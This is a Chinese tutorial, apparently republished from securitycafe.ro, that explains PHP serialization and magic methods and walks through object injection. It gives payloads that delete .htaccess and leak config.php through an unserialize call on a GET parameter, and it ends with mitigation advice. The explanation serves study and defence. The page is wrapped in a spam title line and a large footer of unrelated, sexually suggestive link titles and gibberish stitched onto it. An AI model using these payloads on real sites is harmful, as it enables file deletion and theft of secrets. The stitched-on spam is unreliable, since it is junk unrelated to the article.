精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

詳析php對象注入漏洞

安全 漏洞
php對象注入是一個非常常見的漏洞,這個類型的漏洞雖然有些難以利用,但仍舊非常危險,為了理解這個漏洞,請讀者具備基礎的php知識。

0x00 背景

php對象注入是一個非常常見的漏洞,這個類型的漏洞雖然有些難以利用,但仍舊非常危險,為了理解這個漏洞,請讀者具備基礎的php知識。

[[127324]]

0x01 漏洞案例

如果你覺得這是個渣渣洞,那么請看一眼這個列表,一些被挖到過該漏洞的系統,你可以發現都是一些耳熟能詳的玩意(就國外來說)

WordPress 3.6.1

Magento 1.9.0.1

Joomla 3.0.3

Ip board 3.3.5

除此之外等等一堆系統,八成可能大概在這些還有其他的php程序中還有很多這種類型的漏洞,所以不妨考慮坐下喝杯咖啡并且試著去理解這篇文章。

0x01 PHP類和對象

類和變量是非常容易理解的php概念,打個比方,下面的代碼在一個類中定義了一個變量和一個方法。

  1. <?php  
  2.    
  3. class TestClass  
  4. {  
  5.     // 一個變量  
  6.    
  7.     public $variable = 'This is a string';  
  8.    
  9.     // 一個簡單的方法  
  10.    
  11.     public function PrintVariable()  
  12.     {  
  13.         echo $this->variable;  
  14.     }  
  15. }  
  16.    
  17. // 創建一個對象  
  18.    
  19. $object = new TestClass();  
  20.    
  21. // 調用一個方法  
  22.    
  23. $object->PrintVariable();  
  24.    
  25. ?> 

它創建了一個對象并且調用了 PrintVariable 函數,該函數會輸出變量 variable。

如果想了解更多關于php面向對象編程的知識 請點: http://php.net/manual/zh/language.oop5.php

0x02 php magic方法

php類可能會包含一些特殊的函數叫magic函數,magic函數命名是以符號“__”開頭的,比如 __construct, __destruct, __toString, __sleep, __wakeup 和其他的一些玩意。

這些函數在某些情況下會自動調用,比如:

__construct 當一個對象創建時調用 (constructor) __destruct 當一個對象被銷毀時調用 (destructor) __ toString當一個對象被當作一個字符串使用

為了更好的理解magic方法是如何工作的,讓我們添加一個magic方法在我們的類中。

  1. <?php  
  2.    
  3. class TestClass  
  4. {  
  5.     // 一個變量  
  6.    
  7.     public $variable = 'This is a string';  
  8.    
  9.     // 一個簡單的方法  
  10.    
  11.     public function PrintVariable()  
  12.     {  
  13.         echo $this->variable . '<br />';  
  14.     }  
  15.    
  16.     // Constructor  
  17.    
  18.     public function __construct()  
  19.     {  
  20.         echo '__construct <br />';  
  21.     }  
  22.    
  23.     // Destructor  
  24.    
  25.     public function __destruct()  
  26.     {  
  27.         echo '__destruct <br />';  
  28.     }  
  29.    
  30.     // Call  
  31.    
  32.     public function __toString()  
  33.     {  
  34.         return '__toString<br />';  
  35.     }  
  36. }  
  37.    
  38. // 創建一個對象  
  39. //  __construct會被調用  
  40.    
  41. $object = new TestClass();  
  42.    
  43. // 創建一個方法  
  44. //  'This is a string’ 這玩意會被輸出  
  45.    
  46. $object->PrintVariable();  
  47.    
  48. // 對象被當作一個字符串  
  49. //  __toString 會被調用  
  50.    
  51. echo $object;  
  52.    
  53. // End of PHP script  
  54. // php腳本要結束了, __destruct會被調用  
  55.    
  56. ?> 

我們往里頭放了三個 magic方法,__construct, __destruct和 __toString,你可以看出來,__construct在對象創建時調用, __destruct在php腳本結束時調用,__toString在對象被當作一個字符串使用時調用。

這個腳本會輸出這狗樣:

__construct

This is a string

__toString

__destruct

這只是一個簡單的例子,如果你想了解更多有關magic函數的例子,請點擊下面的鏈接:

http://php.net/manual/zh/language.oop5.magic.php

0x03 php對象序列化

php允許保存一個對象方便以后重用,這個過程被稱為序列化,打個比方,你可以保存一個包含著用戶信息的對象方便等等重用。

為了序列化一個對象,你需要調用 “serialize”函數,函數會返回一個字符串,當你需要用到這個對象的時候可以使用“unserialize”去重建對象。

讓我們在序列化丟進那個例子,看看序列化長什么樣。

  1. <?php  
  2.    
  3. // 某類  
  4.    
  5. class User  
  6. {  
  7.     // 類數據  
  8.    
  9.     public $age = 0;  
  10.     public $name = '';  
  11.    
  12.     // 輸出數據  
  13.    
  14.     public function PrintData()  
  15.     {  
  16.         echo 'User ' . $this->name . ' is ' . $this->age  
  17.              . ' years old. <br />';  
  18.     }  
  19. }  
  20.    
  21. // 創建一個對象  
  22.    
  23. $usr = new User();  
  24.    
  25. // 設置數據  
  26.    
  27. $usr->age = 20;  
  28. $usr->name = 'John';  
  29.    
  30. // 輸出數據  
  31.    
  32. $usr->PrintData();  
  33.    
  34. // 輸出序列化之后的數據  
  35.    
  36. echo serialize($usr);  
  37.    
  38. ?> 

它會輸出

User John is 20 years old.

O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

你可以看到序列化之后的數據中 有 20和John,其中沒有任何跟類有關的東西,只有其中的數據被數據化。

為了使用這個對象,我們用unserialize重建對象。

  1. <?php  
  2.    
  3. // 某類  
  4.    
  5. class User  
  6. {  
  7.     // Class data  
  8.    
  9.     public $age = 0;  
  10.     public $name = '';  
  11.    
  12.     // Print data  
  13.    
  14.     public function PrintData()  
  15.     {  
  16.         echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';  
  17.     }  
  18. }  
  19.    
  20. // 重建對象  
  21.    
  22. $usr = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}');  
  23.    
  24. // 調用PrintData 輸出數據  
  25.    
  26. $usr->PrintData();  
  27.    
  28. ?> 

這會輸出

User John is 20 years old

0x04 序列化magic函數

magic函數constructor (__construct)和 destructor (__destruct) 是會在對象創建或者銷毀時自動調用,其他的一些magic函數會在serialize 或者 unserialize的時候被調用。

__sleep magic方法在一個對象被序列化的時候調用。 __wakeup magic方法在一個對象被反序列化的時候調用。

注意 __sleep 必須返回一個數組與序列化的變量名。

  1. <?php  
  2.    
  3. class Test  
  4. {  
  5.     public $variable = 'BUZZ';  
  6.     public $variable2 = 'OTHER';  
  7.    
  8.     public function PrintVariable()  
  9.     {  
  10.         echo $this->variable . '<br />';  
  11.     }  
  12.    
  13.     public function __construct()  
  14.     {  
  15.         echo '__construct<br />';  
  16.     }  
  17.    
  18.     public function __destruct()  
  19.     {  
  20.         echo '__destruct<br />';  
  21.     }  
  22.    
  23.     public function __wakeup()  
  24.     {  
  25.         echo '__wakeup<br />';  
  26.     }  
  27.    
  28.     public function __sleep()  
  29.     {  
  30.         echo '__sleep<br />';  
  31.    
  32.         return array('variable''variable2');  
  33.     }  
  34. }  
  35.    
  36. // 創建一個對象,會調用 __construct  
  37.    
  38. $obj = new Test();  
  39.    
  40. // 序列化一個對象,會調用 __sleep  
  41.    
  42. $serialized = serialize($obj);  
  43.    
  44. //輸出序列化后的字符串  
  45.    
  46. print 'Serialized: ' . $serialized . <br />';  
  47.    
  48. // 重建對象,會調用 __wakeup  
  49.    
  50. $obj2 = unserialize($serialized);  
  51.    
  52. //調用 PintVariable, 會輸出數據 (BUZZ)  
  53.    
  54. $obj2->PrintVariable();  
  55.    
  56. // php腳本結束,會調用 __destruct   
  57.    
  58. ?> 

這玩意會輸出:

__construct

__sleep

Serialized: O:4:"Test":2:

{s:8:"variable";s:4:"BUZZ";s:9:"variable2";s:5:"OTHER";}

__wakeup

BUZZ

__destruct

__destruct

你可以看到,我們創建了一個對象,序列化了它(然后__sleep被調用),之后用序列化對象重建后的對象創建了另一個對象,接著php腳本結束的時候兩個對象的__destruct都會被調用。

更多相關的內容

http://php.net/manual/zh/language.oop5.serialization.php

0x05 php對象注入

現在我們理解了序列化是如何工作的,我們該如何利用它?事實上,利用這玩意的可能性有很多種,關鍵取決于應用程序的流程與,可用的類,與magic函數。

記住序列化對象的值是可控的。

你可能會找到一套web程序的源代碼,其中某個類的__wakeup 或者 __destruct and其他亂七八糟的函數會影響到web程序。

打個比方,我們可能會找到一個類用于臨時將日志儲存進某個文件,當__destruct被調用時,日志文件會被刪除。

  1. <?php   
  2.    
  3. class LogFile  
  4. {  
  5.     // log文件名  
  6.    
  7.     public $filename = 'error.log';  
  8.    
  9.     // 某代碼,儲存日志進文件  
  10.    
  11.     public function LogData($text)  
  12.     {  
  13.         echo 'Log some data: ' . $text . '<br />';  
  14.         file_put_contents($this->filename, $text, FILE_APPEND);  
  15.     }  
  16.    
  17.     // Destructor 刪除日志文件  
  18.    
  19.     public function __destruct()  
  20.     {  
  21.         echo '__destruct deletes "' . $this->filename . '" file. <br />';  
  22.         unlink(dirname(__FILE__) . '/' . $this->filename);  
  23.     }  
  24. }  
  25.    
  26. ?> 

某例子關于如何使用這個類

  1. <?php  
  2.    
  3. include 'logfile.php';  
  4.    
  5. // 創建一個對象  
  6.    
  7. $obj = new LogFile();  
  8.    
  9. // 設置文件名和要儲存的日志數據  
  10.    
  11. $obj->filename = 'somefile.log';  
  12. $obj->LogData('Test');  
  13.    
  14. // php腳本結束啦,__destruct被調用,somefile.log文件被刪除。  
  15.    
  16. ?> 

在其他的腳本,我們可能又恰好找到一個調用“unserialize”函數的,并且恰好變量是用戶可控的,又恰好是$_GET之類的。

  1. <?php  
  2.    
  3. include 'logfile.php';  
  4.    
  5. // ... 一些狗日的代碼和 LogFile 類 ...  
  6.    
  7. // 簡單的類定義  
  8.    
  9. class User  
  10. {  
  11.     // 類數據  
  12.    
  13.     public $age = 0;  
  14.     public $name = '';  
  15.    
  16.     // 輸出數據  
  17.    
  18.     public function PrintData()  
  19.     {  
  20.         echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';  
  21.     }  
  22. }  
  23.    
  24. // 重建 用戶輸入的 數據  
  25.    
  26. $usr = unserialize($_GET['usr_serialized']);  
  27.    
  28. ?> 

你看,這個代碼調用了 “LogClass” 類,并且有一個 “unserialize” 值是我們可以注入的。

所以構造類似這樣的東西:

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

究竟發生了什么呢,因為輸入是可控的,所以我們可以構造任意的序列化對象,比如:

  1. <?php  
  2.    
  3. $obj = new LogFile();  
  4. $obj->filename = '.htaccess';  
  5.    
  6. echo serialize($obj) . '<br />';  
  7.    
  8. ?> 

這個會輸出

O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";}

__destruct deletes ".htaccess" file.

現在我們將構造過后的序列化對象發送給剛才的腳本:

script.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess”;}

這會輸出

__destruct deletes ".htaccess" file.

現在 .htaccess 已經被干掉了,因為腳本結束時 __destruct會被調用。不過我們已經可以控制“LogFile”類的變量啦。

這就是漏洞名稱的由來:變量可控并且進行了unserialize操作的地方注入序列化對象,實現代碼執行或者其他坑爹的行為。

雖然這不是一個很好的例子,不過我相信你可以理解這個概念,unserialize自動調用 __wakeup 和 __destruct,接著攻擊者可以控制類變量,并且攻擊web程序。

0x06 常見的注入點

先不談 __wakeup 和 __destruct,還有一些很常見的注入點允許你利用這個類型的漏洞,一切都是取決于程序邏輯。

打個比方,某用戶類定義了一個__toString為了讓應用程序能夠將類作為一個字符串輸出(echo $obj) ,而且其他類也可能定義了一個類允許__toString讀取某個文件。

  1. <?php   
  2.    
  3. // … 一些include ...  
  4.    
  5. class FileClass  
  6. {  
  7.     // 文件名  
  8.    
  9.     public $filename = 'error.log';  
  10.    
  11.     //當對象被作為一個字符串會讀取這個文件  
  12.    
  13.     public function __toString()  
  14.     {  
  15.         return file_get_contents($this->filename);  
  16.     }  
  17. }  
  18.    
  19. // Main User class  
  20.    
  21. class User  
  22. {  
  23.     // Class data  
  24.    
  25.     public $age = 0;  
  26.     public $name = '';  
  27.    
  28.     // 允許對象作為一個字符串輸出上面的data  
  29.    
  30.     public function __toString()  
  31.     {  
  32.         return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';  
  33.     }  
  34. }  
  35.    
  36. // 用戶可控  
  37.    
  38. $obj = unserialize($_GET['usr_serialized']);  
  39.    
  40. // 輸出 __toString  
  41.    
  42. echo $obj;  
  43.    
  44. ?> 

so,我們構造url

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

再想想,如果我們用序列化調用 FileClass呢

我們創建利用代碼

  1. <?php  
  2.    
  3. $fileobj = new FileClass();  
  4. $fileobj->filename = 'config.php';  
  5.    
  6. echo serialize($fileobj);  
  7.    
  8. ?> 

接著用生成的exp注入url

script.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:10:"config.php”;}

接著網頁會輸出 config.php的源代碼

  1. <?php   
  2. $private_data = 'MAGIC';   
  3. ?> 

ps:我希望這讓你能夠理解。

0x07 其他的利用方法

可能其他的一些magic函數海存在利用點:比如__call 會在對象調用不存在的函數時調用,__get 和 __set會在對象嘗試訪問一些不存在的類,變量等等時調用。

不過需要注意的是,利用場景不限于magic函數,也有一些方式可以在一半的函數中利用這個漏洞,打個比方,一個模塊可能定義了一個叫get的函數進行一些敏感的操作,比如訪問數據庫,這就可能造成sql注入,取決于函數本身的操作。

唯一的一個技術難點在于,注入的類必須在注入點所在的地方,不過一些模塊或者腳本會使用“autoload”的功能,具體可以在這里了解

http://php.net/manual/zh/language.oop5.autoload.php

0x08 如何利用或者避免這個漏洞

別在任何用戶可控的地方使用“unserialize”,可以考慮“json_decode“

0x09 結論

雖然很難找到而且很難利用,但是這真的真的很嚴重,可以導致各種各樣的漏洞。

原文:http://securitycafe.ro/2015/01/05/understanding-php-object-injection/

責任編輯:藍雨淚 來源: 烏云知識庫
相關推薦

2014-11-27 09:31:26

2015-05-11 09:43:07

路由traceroute

2012-04-12 13:36:59

2012-04-12 15:06:44

2010-04-01 11:37:07

無線ADSL寬帶接入方

2012-09-18 14:00:10

2010-04-12 13:41:47

2010-04-12 13:44:48

無線局域網互訪故障

2010-09-13 16:58:13

2012-12-19 10:36:06

2013-01-04 11:40:54

2013-01-04 13:39:51

2013-01-04 13:30:04

2013-01-04 11:22:12

2013-07-03 11:28:47

2013-01-04 13:14:22

2022-07-20 09:25:42

PythonExcel

2013-01-04 11:38:35

2013-04-07 15:48:26

2013-12-09 09:57:37

點贊
收藏

51CTO技術棧公眾號

久久久久久久久久免费视频| 丰满人妻一区二区三区53号| 在线观看免费av片| 希岛爱理av免费一区二区| 欧美色另类天堂2015| 欧美一级二级三级九九九| 在线观看国产区| 国内精品视频在线观看| 欧美日韩国产欧美日美国产精品| 综合久久国产| 少妇高潮一区二区三区69| 伊人久久大香线| 日韩一区二区三免费高清| 国产无限制自拍| 第九色区av在线| 国产99久久久国产精品免费看| 97在线看免费观看视频在线观看| 色一情一交一乱一区二区三区| 亚洲欧美久久精品| 婷婷六月综合亚洲| 亚洲一区3d动漫同人无遮挡 | 亚洲精品1区2区| 中文字幕日韩综合av| 国产精品久久久久久久久| 成人在线手机视频| 精品午夜电影| 日韩欧美一区在线观看| 国产精品视频黄色| 激情国产在线| 亚洲国产一区在线观看| 伊人情人网综合| 国产一区二区三区不卡在线| 成人黄色大片在线观看| 成人午夜在线影院| 在线免费看av片| 日韩成人精品在线观看| 91精品国产91久久久| 劲爆欧美第一页| 中文字幕一区二区精品区| 伊人久久综合97精品| 97人妻精品一区二区三区免 | 裸体武打性艳史| 久久亚洲专区| 中文字幕在线亚洲| 欧美福利在线视频| 成人久久综合| 自拍偷拍亚洲在线| 国产又粗又长又硬| 久久一级电影| zzijzzij亚洲日本成熟少妇| 国产又粗又黄又猛| 精品av一区二区| 国产亚洲综合久久| 少妇太紧太爽又黄又硬又爽小说| 午夜先锋成人动漫在线| 亚洲奶大毛多的老太婆| 国产av自拍一区| 欧美肉体xxxx裸体137大胆| 亚洲视频在线观看| 超薄肉色丝袜一二三| 久久国产电影| 欧美成人激情视频免费观看| 农村黄色一级片| 一区在线观看| 国产99久久精品一区二区永久免费| 中文字幕视频网| 日本亚洲一区二区| 亚洲自拍欧美色图| 欧美天堂在线视频| 久久这里都是精品| 一本一道久久久a久久久精品91| 色网站免费在线观看| 亚洲免费在线播放| 欧美精品卡一卡二| 五月天av在线| 欧美日韩情趣电影| 欧美xxxx日本和非洲| 欧美爱爱网站| 在线视频一区二区| 久久免费公开视频| 免费看的黄色欧美网站| 国产欧美在线播放| 国精产品一品二品国精品69xx| 99国产精品久久久久久久久久久| 欧美深深色噜噜狠狠yyy| av资源种子在线观看| 亚洲老妇xxxxxx| 免费无码毛片一区二三区| 周于希免费高清在线观看| 欧洲精品在线观看| 超级砰砰砰97免费观看最新一期| 精品视频高潮| 日韩小视频网址| 国产一级在线视频| 日韩高清在线不卡| 国产精品白丝jk白祙| 毛片在线能看| 一区二区三区高清不卡| 欧洲熟妇精品视频| 荡女精品导航| 日韩视频一区在线| 91精品国产高清一区二区三密臀| 久久国产人妖系列| 麻豆成人av| 在线中文字幕视频观看| 色婷婷激情久久| 国产精品偷伦视频免费观看了| 国产不卡一区| 欧美日韩福利电影| 在线观看视频二区| 91麻豆视频网站| 欧美 日韩 国产精品| 国产另类xxxxhd高清| 精品sm在线观看| 又嫩又硬又黄又爽的视频| 亚洲精品专区| 91手机在线播放| 在线中文资源天堂| 日本韩国一区二区三区| 亚洲色偷偷色噜噜狠狠99网| 久久久久久久久丰满| 国产精品99久久久久久www| 日本美女一级片| 亚洲黄色在线视频| 中文字幕第一页在线视频| 精品国产一区一区二区三亚瑟| 久久久久久有精品国产| 国产欧美一级片| 国产精品久久夜| 不卡av免费在线| 日韩极品在线| 2019精品视频| 手机av在线免费观看| 一区二区三区丝袜| 午夜大片在线观看| 国产精品久久久久久麻豆一区软件 | 成年人在线观看av| 一区二区高清| 鲁丝一区鲁丝二区鲁丝三区| 欧美大胆a人体大胆做受| 日韩精品在线看片z| 青娱乐国产在线| 国产自产高清不卡| 好色先生视频污| 国产一区二区av在线| 久久精品电影一区二区| 国产又色又爽又黄又免费| 国产精品理论片| www.99r| 91精品国产乱码久久久久久久| 国产日韩视频在线观看| 永久免费av在线| 6080午夜不卡| 免费中文字幕在线| 成人黄色a**站在线观看| 欧美视频免费看欧美视频| 哺乳一区二区三区中文视频 | 中文字幕系列一区| 日韩一区二区三区国产| 国产精品高潮呻吟av| 亚洲欧美日韩久久精品| 亚洲va在线va天堂va偷拍| 羞羞答答成人影院www| 99影视tv| 亚洲精品福利电影| 亚洲一级免费视频| 亚洲图片中文字幕| 亚洲影院在线观看| 无码人妻aⅴ一区二区三区| 亚洲欧美日韩精品一区二区| 欧美一区二区三区四区夜夜大片 | 免费高清视频精品| 中文字幕一区二区三区四区五区| 国产专区精品| 午夜精品久久久久久久久久久久| 精品推荐蜜桃传媒| 91精品久久久久久久99蜜桃 | 久草资源在线观看| 亚洲电影免费观看| www.av88| 亚洲一区二区美女| 成人小视频免费看| 成人自拍视频在线| 国产理论在线播放| 亚洲夜间福利| 亚洲不卡中文字幕| 久久av偷拍| 日本久久亚洲电影| 性国产高清在线观看| 亚洲美女av网站| 99久久免费国产精精品| 一本色道**综合亚洲精品蜜桃冫| 日韩在线观看免| 91丨porny丨蝌蚪视频| 欧美日韩一区二区三区69堂| 影音先锋久久资源网| 性欧美.com| 美女av一区| 91九色视频导航| 欧美黑人巨大xxxxx| 精品少妇v888av| 91视频在线观看| 亚洲精品福利在线| www.日韩高清| 欧美日韩一本到| 亚洲日本韩国在线| 亚洲影院理伦片| 青青操在线视频观看| 久久久精品黄色| 人妻av一区二区| 国产福利电影一区二区三区| 国产精品亚洲二区在线观看| 在线欧美福利| 麻豆映画在线观看| 欧美xxxxx视频| 欧洲av一区| 欧美一区二区三区红桃小说| 99久久伊人精品影院| 欧美视频第一| 国产精品99久久99久久久二8| 女海盗2成人h版中文字幕| 久久国产色av| av网站导航在线观看免费| 中国日韩欧美久久久久久久久| 视频一区二区三区在线看免费看| 精品国产网站在线观看| 91丨porny丨在线中文| 在线观看亚洲精品视频| 特级毛片www| 欧美日韩视频在线| 国产视频91在线| 无吗不卡中文字幕| 亚洲 欧美 视频| 天天色综合天天| 天堂在线免费观看视频| 亚洲.国产.中文慕字在线| 国产在线欧美在线| 亚洲一二三四久久| 日本三级片在线观看| 亚洲午夜在线观看视频在线| 欧美又粗又大又长| 亚洲一区二区三区精品在线| 久草视频中文在线| 亚洲在线观看免费| 日韩精品――中文字幕| 激情亚洲一区二区三区四区| 日韩成人高清视频| 欧美日韩一区二区三区| 美日韩一二三区| 在线观看日韩av先锋影音电影院| 精品久久久久久久久久久久久久久久 | 国产香蕉一区二区三区| 中文不卡在线| 欧美中文字幕在线观看视频| 狠狠爱www人成狠狠爱综合网 | 老司机亚洲精品| 99热手机在线| 国产在线精品视频| 久久久久国产免费| 91视频一区二区三区| 一区二区三区四区免费| 中文在线资源观看网站视频免费不卡 | 天堂v视频永久在线播放| 亚洲男人天堂古典| 1769在线观看| 欧美成人在线网站| 久草在线中文最新视频| 国产999精品视频| 在线免费观看亚洲| 国产精品一级久久久| 免费看日本一区二区| 亚洲综合五月天| 国产精品黄色| av片中文字幕| 精品一区二区精品| 久久久久久婷婷| 中文一区一区三区高中清不卡| 精品无码一区二区三区蜜臀| 亚洲一区二区综合| 亚洲色成人www永久网站| 3d动漫精品啪啪一区二区竹菊| 免费观看国产精品| 怡红院精品视频| 麻豆av在线免费观看| 秋霞av国产精品一区| 91成人在线网站| 久久综合给合久久狠狠色| 第一sis亚洲原创| 九九热只有这里有精品| 蜜臀av亚洲一区中文字幕| 少妇熟女视频一区二区三区| 2024国产精品| 欧美日韩精品亚洲精品| 日本高清不卡视频| 懂色av蜜臀av粉嫩av分享吧| 国产一区二区三区丝袜| 91福利在线尤物| 国产精品专区一| 任你躁在线精品免费| 性欧美18一19内谢| 裸体一区二区| 久久久久国产精品无码免费看| 国产精品免费aⅴ片在线观看| 日韩熟女精品一区二区三区| 欧美三级视频在线观看| 亚洲欧洲国产综合| 欧美精品18videos性欧| 美女视频一区| 欧美一区2区三区4区公司二百| 国内精品福利| 最新av免费在线观看| 久久夜色精品一区| 国产成年人免费视频| 666欧美在线视频| 国产永久av在线| 日韩av免费看网站| 国偷自产av一区二区三区| 26uuu成人| 免费观看在线色综合| 新91视频在线观看| 欧美午夜视频在线观看| 国模无码一区二区三区| 久久久精品国产| 亚洲国产伊人| 亚洲精品电影在线一区| 日韩和欧美的一区| 亚洲一区二区三区蜜桃| 婷婷国产在线综合| 神宫寺奈绪一区二区三区| 欧美激情国内偷拍| 2023国产精华国产精品| 神马午夜伦理影院| 国产在线视视频有精品| 男人晚上看的视频| 在线成人免费观看| 黄页视频在线播放| 91免费欧美精品| 欧美va天堂| 日韩精品xxx| 亚洲一区二区三区视频在线播放| 精品国自产拍在线观看| 欧美成aaa人片在线观看蜜臀| crdy在线观看欧美| 麻豆视频传媒入口| 成人午夜私人影院| 久久狠狠高潮亚洲精品| 日韩国产高清视频在线| av资源亚洲| 青青成人在线| 久久国产成人午夜av影院| 青青草自拍偷拍| 欧美丰满少妇xxxxx高潮对白 | 亚洲综合成人网| 性网爆门事件集合av| 久久久久久久一区二区三区| 国产日韩三级| 人妻精品无码一区二区三区 | 影音先锋亚洲天堂| 亚洲男人天堂九九视频| 国产成人精品一区二三区在线观看 | 国产高清免费在线播放| 国产精品网址在线| 欧美高清视频在线观看mv| 亚洲一区二区偷拍| 亚洲国产日韩在线一区模特 | 红杏一区二区三区| 超碰网在线观看| 国产精品福利一区| 亚洲黄色在线观看视频| 欧美做受高潮电影o| 奇米影视亚洲| 色悠悠在线视频| 在线欧美日韩精品| dy888亚洲精品一区二区三区| 国产高清精品一区| 久久成人免费| wwwav国产| 日韩电影免费观看在线观看| 51一区二区三区| 9色porny| 国产欧美日韩麻豆91| 亚洲怡红院av| 性欧美激情精品| 97精品国产| 鲁大师私人影院在线观看| 777久久久精品| 三级中文字幕在线观看| 一区二区欧美日韩| 91麻豆高清视频| 国产精品伦一区二区三区| 26uuu亚洲伊人春色| 羞羞答答成人影院www| 素人fc2av清纯18岁| 欧美一区二区三区视频免费 | 日韩欧美一级特黄在线播放| 激情都市亚洲| 亚洲色成人www永久在线观看| 国产日韩欧美不卡| 天天操天天干天天爱| 成人在线一区二区|